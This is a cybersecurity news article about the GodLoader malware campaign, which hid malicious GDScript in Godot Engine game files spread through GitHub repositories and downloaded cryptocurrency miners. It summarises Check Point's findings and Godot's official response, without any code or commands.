GodLoader malware exploits Godot Engine to spread across platforms, avoids detection

Godot is a popular game engine that is now being exploited to infect users

GodLoader malware spread via gaming engine Godot

Cybersecurity experts have recently uncovered a sophisticated malware campaign lead by Stargazers Ghost Network that exploits the Godot Engine, a popular open-source game engine used by indie developers worldwide.

Identified by Check Point Research,[1] this campaign uses a new method to deliver malware, leveraging the engine's scripting language, GDScript. The threat, known as GodLoader, has already infected over 17,000 devices since its discovery and represents a growing concern for both game developers and players alike:[1]

Check Point identified GodLoader, a loader that employs this new technique. The threat actor behind this malware has been utilizing it since June 29, 2024, infecting over 17,000 machines

Hardly detected by security solutions

One of the most concerning aspects of this attack is that it has been designed to bypass detection by most antivirus engines. The malware scripts used in GodLoader are designed to blend in with legitimate game files and since Godot is an open-source and well-regarded platform, security solutions often don't flag infected files, thus allowing the malware to avoid detection with little resistance.

Analysis using VirusTotal, a well-respected malware scanning tool, showed that the malware remained largely unrecognized by most anti-virus engines. It is in this scenario, due to the attackers' leveraging of Godot's scripting language – GDScript – to run instructions that, by all appearances in the context of the environment provided by the game engine, look completely legitimate, and so this low-key approach to execution makes GodLoader extremely hard to detect and stop before it can do even more significant damage.

Moreover, the malware does not always behave aggressively in its early stages. It does not display the usual characteristics of a virus, such as unusual network activity or file modifications. Instead, it silently runs in the background, downloading additional payloads like cryptocurrency miners, which hijack the computing power of the infected system.

Methods of operation: exploiting legitimate software

The GodLoader attack is part of a larger trend where cybercriminals are leveraging legitimate, well-used software as vectors of malicious payload delivery. Attaching malware inside Godot's scripts affords the attackers the benefit of trust that developers and gamers have in this engine. This is a textbook example of how attackers are increasingly relying on trusted platforms to distribute their malware.

Once installed, GodLoader connects to an external server in order to download other malicious payloads. One of the most common payloads seen in this campaign is XMRig,[2] a cryptocurrency miner that utilizes the resources of the compromised system to mine Monero (XMR) without the user's knowledge or consent. In so doing, the attackers can make a profit from the hijacked resources and leave minimal traces on the infected system.

While the malware primarily targets Godot users, it is versatile and can spread across different operating systems. This multi-platform capability significantly expands the attack’s reach, making it a significant threat for both game developers and players who download mods or updates for their games. The malware is also distributed through GitHub repositories, which are often trusted by the gaming community, further legitimizing the malicious files.

1.2 million users in danger

The impact of GodLoader is far-reaching. The potential for infection extends to over 1.2 million users of Godot-based games. Indie developers, many of whom use Godot for creating games, may unknowingly distribute infected files, potentially putting their player base at risk. The threat is exacerbated by the large-scale operation of the Stargazers Ghost Network, which uses over 200 GitHub repositories and 225 Stargazers to legitimize the spread of malicious content.

In addition to the widespread reach within the gaming community, the network’s activity highlights a concerning trend of malware-as-a-service operations. The attackers behind this campaign are not only distributing GodLoader but are also selling their expertise through Telegram channels[3] and other criminal marketplaces. This makes the malware harder to trace and stop, as the attackers have a sophisticated infrastructure that can distribute various types of malware.

Godot response: “The vulnerability is not specific to Godot”

On November 24, Godot replied to the Check Point Research team's findings with the official statement published on the official website. In their statement,[4] the team clarified that the malicious scripts were introduced via third-party content and not through Godot’s codebase or official distribution channels.

To mitigate risks, Godot advises users to verify the sources of any downloaded scripts or assets, especially mods or community-created content.

Users who merely have a Godot game or editor installed on their system are not specifically at risk. We encourage people to only execute software from trusted sources – whether it’s written using Godot or any other programming system.

About the author
Gabriel E. Hall
Gabriel E. Hall - Passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.

Contact Gabriel E. Hall
About the company Esolutions

References
Files
Software
Compare